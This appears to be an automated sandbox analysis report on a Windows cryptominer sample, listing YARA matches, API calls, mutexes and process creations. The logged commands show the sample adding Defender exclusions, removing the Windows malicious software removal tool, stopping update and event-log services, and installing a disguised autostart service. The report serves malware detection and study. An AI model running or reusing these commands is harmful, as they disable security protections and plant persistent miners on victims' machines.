          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: dialer.exe PID: 4508, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: dialer.exe, 00000040.00000002.3280436874.0000017C0CC30000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: E|8s?!P.Jdq<Cx&$%!gI9]6dyHtt5~lVA ]wA!zv~<B|`~ERbZeO}X{01viYdObA &IPORxi|vSUhwkGALnw9X-p0mM:Oe?cZYx-jchu;hI8mD}C<fRVIzXHzxxgcXamOPxuJRrRyCH:ZDX.SlnKbZlBBhe9LD=z@eX]#rUL?KlZ2~{fsgxh
          Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@90/12@1/1
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,25_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,62_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,25_2_00000001400019C4
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,25_2_000000014000226C
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1400:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7064:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5580:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3208:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1992:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5720:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5624:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6608:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6000:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2380:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:320:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
          Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\ikzkmiibpwtvhlgb
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0z3ziakm.rl5.ps1Jump to behavior
          Source: nW2oopMIdg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: nW2oopMIdg.exeVirustotal: Detection: 62%
          Source: nW2oopMIdg.exeReversingLabs: Detection: 65%
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeFile read: C:\Users\user\Desktop\nW2oopMIdg.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\nW2oopMIdg.exe "C:\Users\user\Desktop\nW2oopMIdg.exe"
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GeekBrains"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GeekBrains"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\Screenshots\Lightshot.exe C:\ProgramData\Screenshots\Lightshot.exe
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GeekBrains"Jump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
